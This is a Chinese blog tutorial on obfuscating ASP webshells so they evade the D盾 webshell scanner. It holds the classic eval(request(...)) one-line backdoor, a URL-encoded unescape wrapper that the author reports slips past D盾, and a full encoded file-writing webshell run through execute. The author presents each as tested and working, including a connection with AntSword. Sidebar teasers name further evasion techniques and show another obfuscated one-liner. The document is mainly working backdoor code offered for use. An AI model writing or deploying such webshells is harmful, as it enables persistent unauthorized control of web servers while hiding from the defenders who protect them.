WebShell免杀之ASP

最新推荐文章于 2025-08-14 01:37:40 发布
原创 最新推荐文章于 2025-08-14 01:37:40 发布 · 870 阅读 · 30 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络安全 #web安全

1 前言

授人以鱼不如授人以渔

所以准备给星球写一份免杀的系列文章

让大家自己掌握免杀的一些技巧跟方法,这样即使脚本失效也不用每次都催着我更新了

正好前一段时间有成员问我asp免杀的问题,那就先拿asp开刀吧。

2 正文

2.1 第一步,确定免杀目标

比如普通的asp一句话就是

1

<% eval(request("mr6"))%>

或者

1

<% execute request("mr6") %>

也就是说你的shell在一系列操作之后要达到这种效果

因为eval execute在asp中类似一种语言结构,除了大小写之外不能对其进行变化

所以我们混淆的重点主要是后面的request("mr6")参数

2.2 第二步,打开语法手册

百度搜一个asp语法手册

VBScript 函数

查找到字符串有关的函数,随便选一个

img

他这里只是显示了一部分,我就拿unescape来举例子

2.3 第三步,混淆

unescape在asp中相当于php的urldecode,就是url编码

所以先把payload给编码一遍

为了增强混淆的效果,所以采用burp的decoder模块,因为burp是对所有字符进行编码。

img

扫一下,发现四级

提示eval参数xxxx

img

那么我们定义个函数传进去呢

发现已经降到了一级

img

但是我们的目标是做到0级

继续分析一下查杀的原因是参数test(xxxx)

随便改一下参数内容试一下

img

当我们传入123456时还是报一级,说明这时D盾查杀的只是调用,而跟你传什么东西没有关系

把参数删掉试试

img

此时D盾就不再提示了

所以我们只需要构造一个无参数函数即可

1
2
3
4
5
6
7
8

<%
Function test():
    dim aaa
    aaa="%65%76%61%6c%28%72%65%71%75%65%73%74%28%22%6d%72%36%22%29%29"
	test = unescape(aaa)
End Function
eval(test())
%>

成功bypass D盾

img

使用蚁剑成功连接

img

原理都是一样的,一个函数被杀了就换一个函数

3 反思拓展

既然我们可以把任意的payload编码一下然后eval,那么我们是否可以用同样的办法实现对任意文件免杀?

答案当然是可以的

但是我们前提是要说明一点区别

3.1 eval与execute

3.1.1 Eval 计算一个表达式的值并返回结果

语法:[result = ]Eval(expression)

expression 为任意有效 VBScript 表达式的字符串

示例:response.Write(eval(“3+2”)) ‘输出 5

“3+2” 使用引号括起来,表示是一个字符串,但是在 Eval “眼里”,把它当作一个表达式 3+2 来执行。

3.1.2 Execute 执行一个或多个指定的语句。多个语句间用冒号(:)隔开

语法:Execute statements

示例:Execute “response.Write(““abc””)” ‘输出 abc

“response.Write(““abc””)” 使用引号括起来,表示是一个字符串,但是在 Execute “眼里”,把它当作一个语句 response.Write(“abc”) 来执行。

也就是说对于小马来说只有一句话,所以两者用哪个都可以

但是大马是多句,就不能用eval来执行了,而要用execute

4 具体实现

首先随便找个大马

 		 
 
 

 

 

img
 

 

因为只是举例子,就找一个具有文件保存的大马
 

扫一下不出意外的被杀
 

 

 

img
 

 

4.1 代码处理
 

首先把多余的标签给去掉,只留下中间的代码
 

如果采用url编码的话一定要去掉里面所有的中文!
 

否则会一直报未结束的字符串常量错误
 

 
 		 
 
 

然后扔到burp里进行url编码
 

 

 

img
 

 

然后外层包裹上执行代码
 

 
1
2
3

 		 
<%
execute (unescape("%6f%6e%20%65%72%72%6f%72%20%72%65%73%75%6d%65%20%6e%65%78%74%0a%20%20%69%66%20%72%65%71%75%65%73%74%28%22%70%61%73%73%22%29%3d%22%67%22%20%74%68%65%6e%0a%20%20%73%65%73%73%69%6f%6e%28%22%70%77%22%29%3d%22%67%6f%22%0a%20%20%65%6e%64%20%69%66%0a%69%66%20%73%65%73%73%69%6f%6e%28%22%70%77%22%29%3c%3e%22%67%6f%22%20%74%68%65%6e%20%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%63%65%6e%74%65%72%3e%3c%62%72%3e%3c%66%6f%72%6d%20%61%63%74%69%6f%6e%3d%27%27%20%6d%65%74%68%6f%64%3d%27%70%6f%73%74%27%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%69%6e%70%75%74%20%6e%61%6d%65%3d%27%70%61%73%73%27%20%74%79%70%65%3d%27%70%61%73%73%77%6f%72%64%27%20%73%69%7a%65%3d%27%31%30%27%3e%20%3c%69%6e%70%75%74%20%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%74%79%70%65%3d%27%73%75%62%6d%69%74%27%20%76%61%6c%75%65%3d%27%31%32%33%27%3e%3c%2f%63%65%6e%74%65%72%3e%22%29%0a%65%6c%73%65%0a%0a%73%65%74%20%66%73%6f%3d%73%65%72%76%65%72%2e%63%72%65%61%74%65%6f%62%6a%65%63%74%28%22%73%63%72%69%70%74%69%6e%67%2e%66%69%6c%65%73%79%73%74%65%6d%6f%62%6a%65%63%74%22%29%0a%70%61%74%68%3d%72%65%71%75%65%73%74%28%22%70%61%74%68%22%29%0a%69%66%20%70%61%74%68%3c%3e%22%22%20%74%68%65%6e%0a%64%61%74%61%3d%72%65%71%75%65%73%74%28%22%64%61%22%29%0a%73%65%74%20%64%61%3d%66%73%6f%2e%63%72%65%61%74%65%74%65%78%74%66%69%6c%65%28%70%61%74%68%2c%74%72%75%65%29%0a%64%61%2e%77%72%69%74%65%20%64%61%74%61%0a%69%66%20%65%72%72%3d%30%20%74%68%65%6e%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%79%65%73%22%29%0a%65%6c%73%65%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%6e%6f%22%29%0a%65%6e%64%20%69%66%0a%65%72%72%2e%63%6c%65%61%72%0a%65%6e%64%20%69%66%0a%64%61%2e%63%6c%6f%73%65%0a%73%65%74%20%64%61%3d%6e%6f%74%68%69%6e%67%0a%73%65%74%20%66%6f%73%3d%6e%6f%74%68%69%6e%67%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%66%6f%72%6d%20%61%63%74%69%6f%6e%3d%27%27%20%6d%65%74%68%6f%64%3d%70%6f%73%74%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%69%6e%70%75%74%20%74%79%70%65%3d%74%65%78%74%20%6e%61%6d%65%3d%70%61%74%68%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%62%72%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%70%61%74%68%3a%22%26%73%65%72%76%65%72%2e%6d%61%70%70%61%74%68%28%72%65%71%75%65%73%74%2e%73%65%72%76%65%72%76%61%72%69%61%62%6c%65%73%28%22%73%63%72%69%70%74%5f%6e%61%6d%65%22%29%29%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%62%72%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%6f%73%3a%22%26%52%65%71%75%65%73%74%2e%53%65%72%76%65%72%56%61%72%69%61%62%6c%65%73%28%22%4f%53%22%29%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%62%72%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%57%45%42%3a%22%26%52%65%71%75%65%73%74%2e%53%65%72%76%65%72%56%61%72%69%61%62%6c%65%73%28%22%53%45%52%56%45%52%5f%53%4f%46%54%57%41%52%45%22%29%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%62%72%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%49%50%3a%22%26%52%65%71%75%65%73%74%2e%53%65%72%76%65%72%56%61%72%69%61%62%6c%65%73%28%22%4c%4f%43%41%4c%5f%41%44%44%52%22%29%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%62%72%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%74%65%78%74%61%72%65%61%20%6e%61%6d%65%3d%64%61%20%63%6f%6c%73%3d%35%30%20%72%6f%77%73%3d%31%30%20%77%69%64%74%68%3d%33%30%3e%3c%2f%74%65%78%74%61%72%65%61%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%62%72%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%69%6e%70%75%74%20%74%79%70%65%3d%73%75%62%6d%69%74%20%76%61%6c%75%65%3d%73%61%76%65%3e%22%29%0a%72%65%73%70%6f%6e%73%65%2e%77%72%69%74%65%28%22%3c%2f%66%6f%72%6d%3e%22%29%0a%65%6e%64%20%69%66"))
%>

 
 

先试一下能不能运行
 

 

 

img
 

 

保存个文件试试
 

 

 

img
 

 

 

 

img
 

 

保存成功
 

 

 

img
 

 

用D盾扫一扫,直接就bypass了。。。
 

 

 

img
 

 

看来D盾对于超长字符串参数也是不敏感
 

5 最后
 

套路都是差不多的,自己多动手,想一想,你肯定能做的比我更好。
 

项目地址:https://github.com/caidaox/webshell/tree/main

                

        

    


  



    

      

        

            

              
                
                  seoppg
                
              
            

            

                关注
              
            

        

        

          
      

      










                



	

		

			

				
					
ASP WebShell 后门脚本与

				
			

			

				

					悦分享
				

				

					08-01
					
					2217
					
				

			

		

		

			
				
随着时间的推移和其它新型动态网页技术的兴起,使用ASP(Active Server Page)技术构建的Web应用越来越少。ASP的衰落、旧资料和链接的失效、前辈们早期对ASP较多的研究,都导致了新型ASP网站后门和技术研究的减少。......

			
		

	



                

            
              



	

		

			

				
					
webshell技术强特征+加密

					
最新发布

				
			

			

				

					seoppg的博客
				

				

					08-28
					
					899
					
				

			

		

		

			
				
本文系统介绍了Webshell技术,从环境准备、对抗对象、技术手段到实验操作进行全面解析。主要内容包括:1.对象涵盖主流毒软件和流量检测产品;2.技术手段分为静态对抗(特征码混淆、内存封装等)和动态对抗(API操作、注入劫持等);3.通过冰蝎、哥斯拉等工具的反编译实践,详细演示了流量特征修改、加密算法替换等源码魔改方法。实验部分对比了不同工具在360、火绒等环境下的效果,重点分析了请求头特征修改和加密协议自定义的关键技术,最终实现绕过软检测和流量分析的双重目标。

			
		

	



              


  
              

                


	

		

			

				
					
ASP大马

				
			

			

				

					10-02
				

			

		

		

			
				
ASP大马

			
		

	





	

		

			

				
					
ASP webshell

				
			

			

				

					03-10
				

			

		

		

			
				
ASP webshell  提权 读文件 cmd 等等

			
		

	



		

			
		



	

		

			

				
					
asp-Webshell

				
			

			

				

					weixin_44110913的博客
				

				

					08-23
					
					3788
					
				

			

		

		

			
				
随着时间的推移和其它新型动态网页技术的兴起,使用ASP(Active Server Page)技术构建的Web应用越来越少。ASP的衰落、旧资料和链接的失效、前辈们早期对ASP较多的研究,都导致了新型ASP网站后门和技术研究的减少。
本篇文章主要梳理ASP一句话Webshell的构建和规避检测软件达到源文件的思路。最终构建能够同时绕过以下表格中8个专业木马查工具和平台检测的Webshell,构造出零提示、无警告、无法被检测到的ASP一句话木马后门。


编号
名称
参考链接




1
网站安全狗(.

			
		

	





	

		

			

				
					
ASP一句话

				
			

			

				

					weixin_34148340的博客
				

				

					11-26
					
					1043
					
				

			

		

		

			
				
<%
wei="日日日)""wei""(tseuqer lave 日"
execute(UnEncode(wei))
function UnEncode(cc)
    for i = 1 to len(cc)
        if mid(cc,i,1)<>"日" then
            temp = Mid(cc, i, 1) + temp
   ...

			
		

	





	

		

			

				
					
asp大马-无后门asp大马-最新Asp大马

				
			

			

				

					08-19
				

			

		

		

			
				
本文所介绍的asp大马技巧,除了以上提到的核心思路外,还新增了一些优化方法。类事件指的是利用面向对象编程中的事件机制,通过触发事件来执行特定的代码块,这通常可以混淆安全软件的检测逻辑。垃圾数据填充是...

			
		

	





	

		

			

				
					
JSP webshell——webshell

				
			

			

				

					weixin_46601374的博客
				

				

					06-29
					
					4010
					
				

			

		

		

			
				
好搞笑,我身边的人省护期间天天提到许少,听说是一个很厉害的大佬。结果我跟着学的视频就是这位大佬的。更离谱的是,聪哥说我们是见过许少的,就是上次给红队整理报告的时候,他就在。果然,实习就是好,传说中的大佬们就在身边——虽然我都不认识,但是还是感觉好厉害。来吧,开始学习首先就是最简单的一句话木马: 太容易被发现了而且在我写代码的时候电脑的病毒和威胁防护就已经开始反应了现在将这一句话木马,分开来写  沙箱是通过了✌但是cmd=ipconfig是什么都不出的,netstat -ano也是。 再次修改代码中间

			
		

	





	

		

			

				
					
PHP webshell技术实践与探索.pdf

				
			

			

				

					01-05
				

			

		

		

			
				
首先,我们将介绍 Webshell 的概念和基本特征,然后讨论传统的 Webshell 技术的缺陷,并提出基于语法逻辑、运算逻辑、生僻回调、静态特征隐藏等方法的技术。最后,我们将总结出一套适用于当代 Webshell ...

			
		

	





	

		

			

          精选资源
				
					
webshell:webshell生成工具

				
			

			

				

					04-13
				

			

		

		

			
				
webshell生成工具 知识点:使用注释分隔eval函数内关键字,使用类和构造函数替代引用函数 blog: command:python php_webshell.py 知识点:使用分隔关键字等绕过 blog: 知识点:使用自定义加密绕过软拼接...

			
		

	





	

		

			

				
					
asp webshell

				
			

			

				

					08-15
				

			

		

		

			
				
asp webshell

			
		

	





	

		

			

				
					
webshell asp

				
			

			

				

					07-30
				

			

		

		

			
				
没后门

			
		

	





	

		

			

				
					
asp.net webshell

				
			

			

				

					06-24
				

			

		

		

			
				
asp.net webshell  ASP.NET WEBSHELL

			
		

	





	

		

			

				
					
ASP大马很好用

				
			

			

				

					02-22
				

			

		

		

			
				
ASP大马很好用

			
		

	





	

		

			

				
					
ASP超强提权珍藏版.rar

				
			

			

				

					05-29
				

			

		

		

			
				
ASP超强提权珍藏版.rar

			
		

	





	

		

			

				
					
ASP一句话技巧更新

				
			

			

				

					seoppg的博客
				

				

					08-14
					
					460
					
				

			

		

		

			
				
本文总结了针对主流安全检测工具(D盾、安全狗等)的ASPwebshell技术,重点介绍8类最新绕过方法:1)编码混淆(UTF-7/VBScript.Encode);2)字符串操作与拼接;3)函数数组封装;4)VBScript类事件触发;5)注释与垃圾数据干扰;6)动态对象创建;7)冰蝎webshell改造;8)工具辅助生成。技术要点包括拆分敏感函数、填充无效数据、利用语法特性等,经测试可绕过部分检测,但需注意环境适配和时效性(随规则更新失效)。强调所有技术仅供合法安全研究,并推荐交叉验证工具和参考资源。

			
		

	





	

		

			

				
					
ASP***方法

				
			

			

				

					weixin_33922672的博客
				

				

					08-17
					
					286
					
				

			

		

		

			
				
1.加密法
常用的是用微软的源码加密工具screnc.exe,以此来躲开毒软件的追。优点是见效明显,一般的有害代码用此法加密后,可以存在于服务器上,发挥原有的功能.缺点是代码经过加密后,是不可识别字符,自己也不认识了。
2.大小写转换法
把被程序里的代码,大小写稍作转换.可以躲过一般的毒软件。(WORD可以转换大小写,这招对ASPX***很管用)。
3.混...

			
		

	





	

		

			

				
					
打造ASP程序

				
			

			

				

					rical的专栏
				

				

					11-23
					
					968
					
				

			

		

		

			
				
  制作程序时,程序一上传到服务器,就被删了。我知道,是卡巴的原因。也知道,我代码里有卡巴要过滤的东东。 开始着手制作ASP程序了。。找了几天,困了,累了。。未果。再找。。。找到很多热心的网友制作的教程,思路比较广.默飞个人小结起来.有这么些:1.加密法.把ASP源程序加密.常用的是用微软的源码加密工具screnc.exe,以此来躲开毒软件的追.优点是见效明显,一般的有害代码用此法加密

			
		

	





	

		

			

				
					
Deformity ASP/ASPX WebshellWebshell Hidden Learning

				
			

			

				

					weixin_30685029的博客
				

				

					12-07
					
					1846
					
				

			

		

		

			
				
catalog

0. Active Server Page(ASP)
1. ASP.NET
2. ASP WEBSHELL变形方式
3. ASPX WEBSHELL变形方式
4. webshell中常见的编码转换隐藏方式


0. Active Server Page(ASP)
ASP是动态服务器页面(Active Server Page),是微软公司开发的代替CGI脚本程...

			
		

	





	

		

			

				
					
提升webshell稳定性的开源源码分析

				
			

			

				

					
				

			

		

		

			
				
而“源码webshell”指的是这类webshell木马的源代码是经过精心设计的,目的就是为了规避安全软件的检测和防御机制,即实现所谓的“”功能。  webshell技术涉及到多个层面,包括但不限于代码混淆、加密...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

  
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值